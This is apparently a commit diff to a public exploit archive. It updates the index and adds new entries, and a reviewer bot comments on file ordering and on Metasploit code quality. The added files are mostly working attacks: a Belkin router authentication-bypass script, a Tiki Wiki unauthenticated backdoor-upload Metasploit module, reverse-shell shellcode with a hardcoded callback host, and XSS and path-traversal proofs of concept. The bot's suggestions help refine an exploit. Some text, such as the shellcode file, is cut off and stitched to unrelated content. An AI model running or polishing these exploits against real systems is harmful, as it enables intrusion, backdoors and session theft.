 33125,platforms/php/webapps/33125.txt,"Joomla! Permis 1.0 ('com_groups') Component - 'id' Parameter SQL Injection Vulnerability",2009-06-28,Prince_Pwn3r,php,webapps,0
 33126,platforms/php/webapps/33126.txt,"Matterdaddy Market 1.x - 'index.php' Cross-Site Scripting Vulnerability",2009-06-28,Moudi,php,webapps,0
 33127,platforms/php/webapps/33127.txt,"Miniweb 2.0 Site Builder Module Multiple Cross-Site Scripting Vulnerabilities",2009-06-29,Moudi,php,webapps,0
+40080,platforms/php/webapps/40080.txt,"Tiki Wiki CMS 15.0 - Arbitrary File Download",2016-07-11,"Kacper Szurek",php,webapps,80
+40081,platforms/cgi/webapps/40081.py,"Belkin Router AC1200 Firmware 1.00.27 - Authentication Bypass",2016-07-11,"Gregory Smiley",cgi,webapps,80
+40082,platforms/php/webapps/40082.txt,"WordPress All in One SEO Pack Plugin 2.3.6.1 - Persistent XSS",2016-07-11,"David Vaartjes",php,webapps,80
 33197,platforms/php/webapps/33197.txt,"68 Classifieds 4.1 category.php cat Parameter XSS",2009-07-27,Moudi,php,webapps,0
 33130,platforms/php/webapps/33130.txt,"NTSOFT BBS E-Market Professional - Multiple Cross-Site Scripting Vulnerabilities (1)",2009-06-30,"Ivan Sanchez",php,webapps,0
 33131,platforms/php/webapps/33131.txt,"XOOPS 2.3.3 \\\'op\\\' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-06-30,"Sense of Security",php,webapps,0
@@ -31858,8 +31870,8 @@ id,file,description,date,author,platform,type,port
 35378,platforms/php/webapps/35378.txt,"WordPress DB Backup Plugin - Arbitrary File Download",2014-11-26,"Ashiyane Digital Security Team",php,webapps,80
 35379,platforms/windows/dos/35379.go,"Elipse E3 - HTTP Denial of Service",2014-11-26,firebitsbr,windows,dos,80
 35382,platforms/android/dos/35382.txt,"Android WAPPushManager - SQL Injection",2014-11-26,"Baidu X-Team",android,dos,0
-35383,platforms/cgi/webapps/35383.rb,"Device42 WAN Emulator 2.3 Traceroute Command Injection",2014-11-26,"Brandon Perry",cgi,webapps,80
-35384,platforms/cgi/webapps/35384.rb,"Device42 WAN Emulator 2.3 Ping Command Injection",2014-11-26,"Brandon Perry",cgi,webapps,80
+35383,platforms/cgi/webapps/35383.rb,"Device42 WAN Emulator 2.3 - Traceroute Command Injection",2014-11-26,"Brandon Perry",cgi,webapps,80
+35384,platforms/cgi/webapps/35384.rb,"Device42 WAN Emulator 2.3 - Ping Command Injection",2014-11-26,"Brandon Perry",cgi,webapps,80
 35385,platforms/php/webapps/35385.pl,"WordPress Plugin Slider Revolution 3.0.95 /Showbiz Pro 1.7.1 - Shell Upload Exploit",2014-11-26,"Simo Ben Youssef",php,webapps,80
 35386,platforms/linux/remote/35386.txt,"Logwatch Log File - Special Characters Local Privilege Escalation Vulnerability",2011-02-24,"Dominik George",linux,remote,0
 35387,platforms/php/webapps/35387.txt,"phpShop 0.8.1 - 'page' Parameter Cross-Site Scripting Vulnerability",2011-02-25,"Aung Khant",php,webapps,0
@@ -35259,7 +35271,6 @@ id,file,description,date,author,platform,type,port
 39020,platforms/windows/dos/39020.txt,"Adobe Flash TextField.gridFitType Setter - Use-After-Free",2015-12-17,"Google Security Research",windows,dos,0
 39021,platforms/windows/dos/39021.txt,"Adobe Flash MovieClip.lineStyle - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos,0
 39022,platforms/windows/dos/39022.txt,"Adobe Flash GradientFill - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos,0
-39024,platforms/android/dos/39024.txt,"Samsung Galaxy S6 Samsung Gallery - Bitmap Decoding Crash",2015-12-17,"Google Security Research",android,dos,0
 39025,platforms/windows/dos/39025.txt,"Windows Kernel win32k!OffsetChildren - Null Pointer Dereference",2015-12-17,"Nils Sommer",windows,dos,0
 39026,platforms/win32/dos/39026.txt,"win32k Desktop and Clipboard - Null Pointer Derefence",2015-12-17,"Nils Sommer",win32,dos,0
 39027,platforms/win32/dos/39027.txt,"win32k Clipboard Bitmap - Use-After-Free Vulnerability",2015-12-17,"Nils Sommer",win32,dos,0
@@ -35882,7 +35893,7 @@ id,file,description,date,author,platform,type,port
 39688,platforms/php/webapps/39688.txt,"Ovidentia troubleticketsModule 7.6 - Remote File Inclusion",2016-04-12,bd0rk,php,webapps,80
 39691,platforms/jsp/webapps/39691.py,"Oracle Application Testing Suite 12.4.0.2.0 - Authentication Bypass and Arbitrary File Upload Exploit",2016-04-13,"Zhou Yu",jsp,webapps,8088
 39692,platforms/linux/local/39692.py,"Texas Instrument Emulator 3.03 - Local Buffer Overflow",2016-04-13,"Juan Sacco",linux,local,0
-39693,platforms/unix/remote/39693.rb,"Dell KACE K1000 File Upload",2016-04-13,metasploit,unix,remote,0
+39693,platforms/unix/remote/39693.rb,"Dell KACE K1000 - File Upload",2016-04-13,metasploit,unix,remote,0
 39694,platforms/windows/dos/39694.txt,"Microsoft Office Excel Out-of-Bounds Read Remote Code Execution (MS16-042)",2016-04-14,"Sébastien Morin",windows,dos,0
 39695,platforms/php/webapps/39695.txt,"pfSense Firewall <= 2.2.6 - Services CSRF",2016-04-14,"Aatif Shahdad",php,webapps,443
 39696,platforms/hardware/webapps/39696.txt,"Brickcom Corporation Network Cameras - Multiple Vulnerabilities",2016-04-14,Orwelllabs,hardware,webapps,80
@@ -36019,7 +36030,7 @@ id,file,description,date,author,platform,type,port
 39833,platforms/windows/dos/39833.txt,"Windows - gdi32.dll Multiple Issues in the EMF COMMENT_MULTIFORMATS Record Handling (MS16-055)",2016-05-17,"Google Security Research",windows,dos,0
 39834,platforms/multiple/dos/39834.txt,"Windows - gdi32.dll Heap-Based Buffer Overflow in ExtEscape() Triggerable via EMR_EXTESCAPE EMF Record (MS16-055)",2016-05-17,"Google Security Research",multiple,dos,0
 39835,platforms/multiple/dos/39835.txt,"Symantec/Norton Antivirus - ASPack Remote Heap/Pool Memory Corruption Vulnerability",2016-05-17,"Google Security Research",multiple,dos,0
-39836,platforms/multiple/remote/39836.rb,"Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection",2016-05-17,metasploit,multiple,remote,0
+39836,platforms/multiple/remote/39836.rb,"Dell SonicWALL Scrutinizer 11.01 - methodDetail SQL Injection",2016-05-17,metasploit,multiple,remote,0
 39837,platforms/java/webapps/39837.txt,"SAP xMII 15.0 - Directory Traversal",2016-05-17,ERPScan,java,webapps,0
 39838,platforms/php/webapps/39838.php,"Magento < 2.0.6 - Unauthenticated Arbitrary Unserialize -> Arbitrary Write File",2016-05-18,agix,php,webapps,80
 39840,platforms/xml/webapps/39840.txt,"SAP NetWeaver AS JAVA 7.1 - 7.5 - SQL Injection",2016-05-19,ERPScan,xml,webapps,0
@@ -36068,7 +36079,7 @@ id,file,description,date,author,platform,type,port 39885,platforms/multiple/shellcode/39885.c,"Linux/Windows/BSD x86_64 execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode",2016-06-06,odzhancode,multiple,shellcode,0 39886,platforms/java/webapps/39886.txt,"Apache Continuum 1.4.2 - Multiple Vulnerabilities",2016-06-06,"David Shanahan",java,webapps,0 39887,platforms/cgi/webapps/39887.txt,"Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - ShellShock Exploit",2016-06-06,lastc0de,cgi,webapps,80 -39888,platforms/windows/local/39888.txt,"Valve Steam 3.42.16.13 - Local Privilege Escalation",2016-06-06,gsX,windows,local,0 +39888,platforms/windows/local/39888.txt,"Valve Steam 3.42.16.13 - Local Privilege Escalation",2016-06-06,"Gregory Smiley",windows,local,0 39889,platforms/php/webapps/39889.html,"ArticleSetup 1.00 - CSRF Change Admin Password",2016-06-06,"Ali Ghanbari",php,webapps,80 39890,platforms/php/webapps/39890.txt,"Electroweb Online Examination System 1.0 - SQL Injection",2016-06-06,"Ali Ghanbari",php,webapps,80 39891,platforms/php/webapps/39891.txt,"WordPress WP Mobile Detector Plugin 3.5 - Arbitrary File Upload",2016-06-06,"Aaditya Purani",php,webapps,80 
@@ -36215,6 +36226,8 @@ id,file,description,date,author,platform,type,port 40043,platforms/windows/local/40043.py,"Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution",2016-06-29,"Rémi ROCHER",windows,local,0 40044,platforms/cgi/webapps/40044.html,"Ubiquiti Administration Portal - CSRF to Remote Command Execution",2016-06-29,KoreLogic,cgi,webapps,443 40045,platforms/php/webapps/40045.txt,"Concrete5 5.7.3.1 - (Application::dispatch) Local File Inclusion",2016-06-29,"Egidio Romano",php,webapps,80 +40092,platforms/php/webapps/40092.txt,"Beauty Parlour & SPA Saloon Management System - Blind SQL Injection",2016-07-11,"Yakir Wizman",php,webapps,80 +40093,platforms/php/webapps/40093.txt,"Clinic Management System - Blind SQL Injection",2016-07-11,"Yakir Wizman",php,webapps,80 40049,platforms/linux/local/40049.c,"Linux Kernel 4.4.0-2 (Ubuntu 16.04) - netfilter target_offset OOB Local Root Exploit",2016-07-03,vnik,linux,local,0 40050,platforms/jsp/webapps/40050.txt,"XpoLog Center 6 - Remote Command Execution CSRF",2016-07-04,LiquidWorm,jsp,webapps,30303 40051,platforms/php/webapps/40051.txt,"Ktools Photostore 4.7.5 - Multiple Vulnerabilities",2016-07-04,"Yakir Wizman",php,webapps,80 @@ -36242,3 +36255,4 @@ id,file,description,date,author,platform,type,port 40076,platforms/php/webapps/40076.php,"php Real Estate Script 3 - Arbitrary File Disclosure",2016-07-08,"Meisam Monsef",php,webapps,80 40077,platforms/xml/webapps/40077.txt,"CyberPower Systems PowerPanel 3.1.2 - XXE Out-Of-Band Data Retrieval",2016-07-08,LiquidWorm,xml,webapps,3052 40078,platforms/php/webapps/40078.txt,"Streamo Online Radio And TV Streaming CMS - SQL Injection",2016-07-08,N4TuraL,php,webapps,80 +40079,platforms/lin_x86-64/shellcode/40079.c,"Linux x86-64 Continuously-Probing Reverse Shell via Socket + Port-range + Password - 172 Bytes",2016-07-11,CripSlick,lin_x86-64,shellcode,0 
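Review bot: The two rows added in the first hunk, 40092 and 40093, are inserted between 40045 and 40049, which breaks the ascending id order the rest of files.csv keeps; they belong after the highest existing id, as the second hunk does for `+40079,...`. Their 2016-07-11 dates also sit among 2016-06-29 and 2016-07-03 entries, so a reader scanning by date would miss them. Moving the two lines next to the 40079 row at the end of the file keeps both orderings consistent.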
diff --git a/platforms/android/dos/39024.txt b/platforms/android/dos/39024.txt
deleted file mode 100755
index 55b0aec00..000000000
--- a/platforms/android/dos/39024.txt
+++ /dev/null
@@ -1,33 +0,0 @@ -Source: https://code.google.com/p/google-security-research/issues/detail?id=497 - -Loading the bitmap bmp_memset.bmp can cause a crash due to a memset writing out of bounds. - -I/DEBUG ( 2961): pid: 12383, tid: 12549, name: thread-pool-1 >>> com.sec.android.gallery3d <<< -I/DEBUG ( 2961): signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0x89e84000 - -I/DEBUG ( 2961): x0 0000000089e8117c x1 00000000000000ff x2 00000000177fe13c x3 0000000089e8117c -I/DEBUG ( 2961): x4 0000000000000004 x5 0000007f65f42300 x6 0000000000000002 x7 ffffffffffffffff -I/DEBUG ( 2961): x8 0000000089e83ff0 x9 0000007f65f020b0 x10 000000000000003c x11 000000000000003b -I/DEBUG ( 2961): x12 0000007f65f02080 x13 00000000ffffffff x14 0000007f65f02080 x15 00000000000061e0 -I/DEBUG ( 2961): x16 0000007f6baccc10 x17 0000007f958f8d80 x18 0000007f9596da40 x19 0000007f65f0e180 -I/DEBUG ( 2961): x20 0000007f65f54020 x21 00000000002f0020 x22 0000000000000020 x23 0000000005e00400 -I/DEBUG ( 2961): x24 0000000000000004 x25 0000007f65f42300 x26 0000000000000020 x27 0000007f65f52080 -I/DEBUG ( 2961): x28 00000000000001da x29 0000000013071460 x30 0000007f6ba7e40c -I/DEBUG ( 2961): sp 0000007f66796130 pc 0000007f958f8e28 pstate 0000000020000000 -I/DEBUG ( 2961): -I/DEBUG ( 2961): backtrace: -I/InjectionManager(12532): Inside getClassLibPath caller -I/DEBUG ( 2961): #00 pc 0000000000019e28 /system/lib64/libc.so (memset+168) -I/DEBUG ( 2961): #01 pc 0000000000030408 /system/lib64/libSecMMCodec.so (sbmpd_decode_rle_complete+64) -I/DEBUG ( 2961): #02 pc 0000000000033440 /system/lib64/libSecMMCodec.so (DecodeFile+120) -I/DEBUG ( 2961): #03 pc 000000000000c90c /system/lib64/libSecMMCodec.so (Java_com_sec_samsung_gallery_decoder_SecMMCodecInterface_nativeDecode+436) -I/DEBUG ( 2961): #04 pc 000000000042ec00 /system/priv-app/SecGallery2015/arm64/SecGallery2015.odex - -To reproduce, download the file and open it in Gallery. 
- -This issue was tested on a SM-G925V device running build number LRX22G.G925VVRU1AOE2. - - -Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39024.zip - diff --git a/platforms/cgi/webapps/40081.py b/platforms/cgi/webapps/40081.py new file mode 100755 index 000000000..e52c57d08 --- /dev/null +++ b/platforms/cgi/webapps/40081.py 
@@ -0,0 +1,144 @@ +''' +# Exploit Title: Belkin Router AC1200, Firmware: 1.00.27 - Authentication Bypass +# Date: 5/11/2016 +# Exploit Author: Gregory Smiley +# Contact: gsx0r.sec@gmail.com +# Vendor Homepage: http://www.belkin.com +# Version: Firmware: 1.00.27 +# Tested on:F9K1113 v1 + + +#1. Description: + +#The Belkin AC1200 is vulnerable to authentication bypass due to it performing client side +#authentication after you attempt to login after already having failed a login. That webpage, loginpserr.stm contains the md5 hash value of the administrators password. This can be +#exploited by extracting that hash value, and passing it in the pws field in a post request to +#login.cgi. + +#I would like to note that I contacted Belkin on several occasions +#and gave them plenty of time to reply/fix the issue before releasing this entry. + + + +#2. Proof: + +#Line 55 of loginpserr.stm contains the javascript code: + +#var password = "md5hashofpassword"; + + +#3. Exploit: +''' + +#!/usr/bin/python + + +import urllib + +import urllib2 + +import sys + + +router = raw_input('Enter IP address of your AC1200 to test: ') + +page = urllib2.urlopen('http://'+router+'/loginpserr.stm').read() + +test_page = page + + +vuln_string = 'var password = "' + +if vuln_string in test_page: + + print 'Router is vulnerable.' + answer = raw_input('Would you like to exploit the target? Y/N : ') + + +else: + + + print 'Router is not vulnerable.' + print 'exiting...' + +sys.exit() + + +if (answer == 'y') or (answer == 'Y'): + + + extract = test_page.split(vuln_string, 1)[1] #These two lines extract the leaked hash value + _hash = extract.partition('"')[0] #from /loginpserr.stm using quotes as a delimiter + + +else: + + + if (answer == 'n') or (answer == 'N'): + print 'exiting...' 
+ +sys.exit() + + +#Assemble the POST request to /login.cgi + + + +headers = { + + +'Host': router, + +'Connection': 'keep-alive', + +'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0', + +'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + +'Accept-Language' : 'en-US,en;q=0.5', + +'Accept-Encoding' : 'gzip, deflate', + +'Referer' : 'http://'+router+'/', + +'Connection': 'keep-alive', + +'Content-Type': 'application/x-www-form-urlencoded' + +} + + +data = { + + + +'totalMSec':'0', + +'pws': _hash, + +'url':'status.stm', + +'arc_action':'login', + +'pws_temp': '' + +} + + +data = urllib.urlencode(data) + + +#Sends the POST request with the hash in the pws field + + +req = urllib2.Request('http://'+router+'/login.cgi', data, headers) + + +response = urllib2.urlopen(req) + +the_page = response.read() + + +print 'Exploit successful.' + +print 'You are now free to navigate to http://'+router+'/ ...as admin ;)' diff --git a/platforms/lin_x86-64/shellcode/40079.c b/platforms/lin_x86-64/shellcode/40079.c new file mode 100755 index 000000000..ad06d27a0 --- /dev/null +++ b/platforms/lin_x86-64/shellcode/40079.c 
@@ -0,0 +1,69 @@ +#include +#include + +// Exploit Title: [Continuously-Probing Reverse Shell via Socket + port-range + password (172 bytes)] +// Date: [07/10/2016] +// Exploit Author: [CripSlick] +// Tested on: [Kali 2.0] +// Version: [No program being used or exploited; I only relied on syscalls] + +//========================================================================================= +// ===================== Why use Da LaCrips Reverse Shell?? ============================= + +// 1. The victim can lauch the payload and THEN you can connect (unlike +// every other reverse shell where you must be ready for the connection ahead of time) +// 2. You get multiple ports (that means multiple terminals can run on a single victim) +// 3. If your connection/port gets disconnected, you can accept that port connection right back again +// 4. You will be able to access any linux system disto via syscalls +// 5. You you get a password and easy to change variables +// 6. You can easily link it to an innocuous program sense the terminal closes via fork after launch +// ENJOY!! +//========================================================================================= + +//ShepherdDowling@gmail.com +//OffSec ID: OS-20614 +//http://50.112.22.183/ + +#define IPv4 "\x0a\x01\x01\x04" //in forward-byte-order + +#define High_Port "\x8f\x01" //399 //in reverse-byte-order +#define Low_Port "\x86\x01" //390 //in reverse-byte-order +// python + import socket + hex(socket.htons()) + +#define Password "\x6c\x61\x20\x63\x72\x69\x70\x73" // in forward-byte-order +// Default Password = 'la crips' without quotes +// python + ''[::1].encode('hex') +// you can use complex ascii characters +// example: \x21\x40\x20\x3C\x52\x7C\x70\x24 = !@ model_hp_buffer in the open-source JXR component. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40088.zip 
diff --git a/platforms/multiple/dos/40089.txt b/platforms/multiple/dos/40089.txt
new file mode 100755
index 000000000..14d622654
--- /dev/null
+++ b/platforms/multiple/dos/40089.txt
@@ -0,0 +1,11 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=790
+
+Loading the attached image causes heap corruption due to LMZA property decoding. To reproduce the issue, load the attach file '6' using LoadImage.swf as follows:
+
+LoadImage.swf?img=6
+
+The issue sometimes takes multiple refreshes to crash
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40089.zip
diff --git a/platforms/multiple/dos/40090.txt b/platforms/multiple/dos/40090.txt
new file mode 100755
index 000000000..62055511d
--- /dev/null
+++ b/platforms/multiple/dos/40090.txt
@@ -0,0 +1,9 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=793
+
+There is a heap overflow in ATF impage packing. To reproduce the issue, load the attach file '129' using LoadImage.swf as follows:
+
+LoadImage.swf?img=129
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40090.zip
diff --git a/platforms/php/remote/40091.rb b/platforms/php/remote/40091.rb
new file mode 100755
index 000000000..edb5c2ffe
--- /dev/null
+++ b/platforms/php/remote/40091.rb
@@ -0,0 +1,93 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Tiki Wiki Unauthenticated File Upload Vulnerability', + 'Description' => %q{ + This module exploits a file upload vulnerability in Tiki Wiki <= 15.1 + which could be abused to allow unauthenticated users to execute arbitrary code + under the context of the webserver user. + + The issue comes with one of the 3rd party components. Name of that components is + ELFinder -version 2.0-. This components comes with default example page which + demonstrates file operations such as upload, remove, rename, create directory etc. + Default configuration does not force validations such as file extension, content-type etc. + Thus, unauthenticated user can upload PHP file. + + The exploit has been tested on Debian 8.x 64bit and Tiki Wiki 15.1. 
+ }, + 'Author' => + [ + 'Mehmet Ince ' # Vulnerability discovery and Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'https://www.mehmetince.net/exploit/tiki-wiki-unauthenticated-file-upload-vulnerability' ], + [ 'URL', 'https://tiki.org/article434-Security-update-Tiki-15-2-Tiki-14-4-and-Tiki-12-9-released' ] + ], + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Payload' => + { + 'DisableNops' => true + }, + 'Targets' => [ ['Automatic', {}] ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jul 11 2016' + )) + + register_options( + [ + OptString.new('TARGETURI', [ true, "Installed path of Tiki Wiki", "/tiki/"]) + ], self.class) + end + + def check + url = normalize_uri(target_uri.path, "vendor_extra/elfinder/elfinder.html") + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(url) + ) + if res && res.code == 200 + return Exploit::CheckCode::Appears + end + return Exploit::CheckCode::Safe + end + + def exploit + filename = rand_text_alpha(8 + rand(4)) + '.php' + data = Rex::MIME::Message.new + data.add_part('upload', nil, nil, 'form-data; name="cmd"') + data.add_part('l1_Lw', nil, nil, 'form-data; name="target"') + data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload[]\"; filename=\"#(unknown)\"") + print_status("Uploading backdoor file.") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "vendor_extra/elfinder/php/connector.minimal.php"), + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'data' => data.to_s + }) + if res && res.code == 200 + print_good("Backdoor successfully created.") + else + fail_with(Failure::Unknown, "#{peer} - Error on uploading file") + end + print_status("Trigging the exploit...") + send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "vendor_extra/elfinder/files/" + filename) + }, 5) + end +end \ No newline at end of file 
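Review bot: `check` normalizes the same path twice — `url` is already the result of `normalize_uri(target_uri.path, ...)`, so `'uri' => url` is enough — and the two explicit `return`s are redundant; the method can end with `res && res.code == 200 ? Exploit::CheckCode::Appears : Exploit::CheckCode::Safe`. In `exploit`, a `nil` response (no reply at all) and a non-200 reply are both reported as `Failure::Unknown, "#{peer} - Error on uploading file"`; using `Failure::Unreachable` when `res.nil?` would let the console output distinguish a dead host from a rejected request. The file also ends without a trailing newline. The `initialize` body continues from the previous line of the hunk.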
diff --git a/platforms/php/webapps/40080.txt b/platforms/php/webapps/40080.txt new file mode 100755 index 000000000..5a311027d --- /dev/null +++ b/platforms/php/webapps/40080.txt @@ -0,0 +1,57 @@ +# Exploit Title: Tiki Wiki CMS 15.0 Arbitrary File Download +# Date: 11-07-2016 +# Software Link: https://tiki.org +# Exploit Author: Kacper Szurek +# Contact: http://twitter.com/KacperSzurek +# Website: http://security.szurek.pl/ +# Category: webapps + +1. Description + +Using `flv_stream.php` file from `vendor` directory we can download any file. + +http://security.szurek.pl/tiki-wiki-cms-150-arbitrary-file-download.html + +File: tiki-15.0\vendor\player\flv\flv_stream.php + + + +2. Proof of Concept + +Example for downloading database configuration: + +http://tiki/vendor/player/flv/flv_stream.php?file=../../../db/local.php&position=0 + +3. Solution: + +Update to version 15.1 + +Timeline: + + 01-06-2016: Discovered + 01-06-2016: Vendor notified + 08-06-2016: Version 15.1 released, issue resolved diff --git a/platforms/php/webapps/40082.txt b/platforms/php/webapps/40082.txt new file mode 100755 index 000000000..8d2d660df --- /dev/null +++ b/platforms/php/webapps/40082.txt 
@@ -0,0 +1,75 @@ +Persistent Cross-Site Scripting in All in One SEO Pack WordPress Plugin +David Vaartjes + +Abstract +A stored Cross-Site Scripting vulnerability was found in the Bot Blocker functionality of the All in One SEO Pack WordPress Plugin (1+ million active installs). This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. + +Tested versions +This issue was successfully tested on the All in One SEO Pack WordPress Plugin version 2.3.6.1. + +Fix +This issue has been fixed in version 2.3.7 of the plugin. + +Introduction +All in One SEO Pack is reportedly the most downloaded plugin for WordPress. It allows users to automatically optimize their site for Search Engines. A stored Cross-Site Scripting vulnerability exists in the Bot Blocker functionality. + +Details +A stored Cross-Site Scripting vulnerability exists in the Bot Blocker functionality of the All in One SEO Pack WordPress Plugin (1+ million active installs). Particularly interesting about this issue is that an anonymous user can simply store his XSS payload in the Admin dashboard by just visiting the public site with a malformed User Agent or Referrer header. + +The SEO Pack Bot Blocker functionality can be used to prevent certain bots from accessing/crawling the website. Bots can be detected based on User Agent and Referrer header patterns. When the User Agent contains one of the pre-configured list of bot names like "Abonti", "Bullseye" or "Exabot" the request is blocked and a 404 is returned. + +If the "Track Blocked Bots" setting is enabled (not by default), blocked request are logged in that HTML page without proper sanitization or output encoding, allowing XSS. 
+ +The affected resource: /all-in-one-seo-pack/modules/aioseop_bad_robots.php + +if ( $this->option_isset( 'block_bots' ) ) { + if ( !$this->allow_bot() ) { + status_header( 503 ); + $ip = $_SERVER['REMOTE_ADDR']; +-> $user_agent = $_SERVER['HTTP_USER_AGENT']; +-> $this->blocked_message( sprintf( __( "Blocked bot with IP %s -- matched user agent %s found in blocklist.", +-> 'all-in-one-seo-pack' ), $ip, $user_agent ) ); + exit(); + } elseif ( $this->option_isset( 'block_refer' ) && $this->is_bad_referer() ) { + status_header( 503 ); + $ip = $_SERVER['REMOTE_ADDR']; +-> $referer = $_SERVER['HTTP_REFERER']; +-> $this->blocked_message( sprintf( __( "Blocked bot with IP %s -- matched referer %s found in blocklist.", +-> 'all-in-one-seo-pack' ), $ip, $referer ) ); + } +} + +The resulting HTML code: + +
2016-07-05 18:59:37 Blocked bot with IP 172.16.232.1 -- matched user agent Abonti 
found in blocklist. + +Proof of concept + +1/ Go to the "Bad Bot Blocker" settings page in All in one SEO menu. +2/ Enable "Block Bad Bots using HTTP" and/or "Block Referral Spam using HTTP". +3/ Send exploit request (with payload in referer or user-agent) to the server. Anywhere. Make sure to send your exploit request as an anonymous user. When you are logged in (have cookies), you are never seen as a bot. +4/ If all set up ok, your request will be blocked (HTTP/1.1 503 Service Unavailable) +5/ Open the "Bad Bot Blocker" settings page as WP admin. +6/ Your payload will run, since it is logged in a
 tag.
+
+Potential use "Track Blocked Bots" setting to show/hide the 
 block. Not needed for payload to run. Payload can be set in User-Agent or Referer field
+
+REQUEST:
+
+GET / HTTP/1.1
+Host: 172.16.232.130
+User-Agent: Abonti 
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://172.16.232.130/
+Connection: close +Cache-Control: max-age=0 +RESPONSE: + +HTTP/1.1 503 Service Unavailable +Date: Tue, 05 Jul 2016 19:31:19 GMT +Server: Apache/2.4.18 (Ubuntu) +Content-Length: 0 +Connection: close +Content-Type: text/html; charset=UTF-8 diff --git a/platforms/php/webapps/40083.txt b/platforms/php/webapps/40083.txt new file mode 100755 index 000000000..b5b791f79 --- /dev/null +++ b/platforms/php/webapps/40083.txt 
@@ -0,0 +1,48 @@ +Persistent Cross-Site Scripting in WordPress Activity Log plugin +Han Sahin + +Abstract + +A stored Cross-Site Scripting (XSS) vulnerability has been found in the WordPress Activity Log plugin. By using this vulnerability an attacker can inject malicious JavaScript code into the application, which will execute within the browser of any user who views the Activity Log, in general WP admin. + +Tested versions + +This issue was successfully tested on WordPress Activity Log plugin version 2.3.1. + +Fix + +This issue has been fixed in version 2.3.2 of the WordPress Activity Log plugin. The updated plugin can be downloaded from the following location: https://downloads.wordpress.org/plugin/aryo-activity-log.2.3.2.zip. + +Introduction + +The WordPress Activity Log plugin allows monitoring and tracking of site activity on a WordPress site. A stored Cross-Site Scripting vulnerability has been discovered in the WordPress Activity Log plugin which allows an unauthenticated attacker to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the Activity Log (WP admin). + +Details + +The WordPress Activity Log plugin fails to sufficiently check input supplied to the X-Forwarded-For HTTP header and perform output encoding when the input is presented in a "wrong password event". As a result the malicious request will be stored in the Activity Log page, executing the payload when an unsuspecting user views this specific page. + +An attacker can use this vulnerability to perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes or deliver malware. + +Persistent Cross-Site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users (victims). 
+ + +Proof of concept + +This vulnerability can be demonstrated by submitting an XFF header similar to the following: + +POST /wp-login.php HTTP/1.1 +Host: 192.168.28.135 +Content-Length: 113 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 +(KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Referer: http:// +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.8,nl;q=0.6 +X-Forwarded-For: +Connection: close + +log=wordpress&pwd=sdsdssdsdsd&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.28.135%2Fwp-admin%2F&testcookie=1 \ No newline at end of file diff --git a/platforms/php/webapps/40084.txt b/platforms/php/webapps/40084.txt new file mode 100755 index 000000000..27458ae25 --- /dev/null +++ b/platforms/php/webapps/40084.txt 
@@ -0,0 +1,72 @@ +--------------------------------------------------------------------------- +IPS Community Suite <= 4.1.12.3 Autoloaded PHP Code Injection Vulnerability +--------------------------------------------------------------------------- + + +[-] Software Link: + +https://invisionpower.com/ + + +[-] Affected Versions: + +Version 4.1.12.3 and prior versions. + + +[-] Vulnerability Description: + +The vulnerable code is located in the /applications/core/modules/front/system/content.php script: + +38. $class = 'IPS\\' . implode( '\\', explode( '_', \IPS\Request::i()->content_class ) ); +39. +40. if ( ! class_exists( $class ) or ! in_array( 'IPS\Content', class_parents( $class ) ) ) +41. { +42. \IPS\Output::i()->error( 'node_error', '2S226/2', 404, '' ); +43. } + +User input passed through the "content_class" request parameter is not properly sanitized before being used in a call +to the "class_exists()" function at line 40. This could be exploited by unauthenticated attackers to inject and execute +arbitrary PHP code leveraging the autoloading function defined into the /applications/cms/Application.php script: + +171. if ( mb_substr( $class, 0, 14 ) === 'IPS\cms\Fields' and is_numeric( mb_substr( $class, 14, 1 ) ) ) +172. { +173. $databaseId = mb_substr( $class, 14 ); +174. eval( "namespace IPS\\cms; class Fields{$databaseId} extends 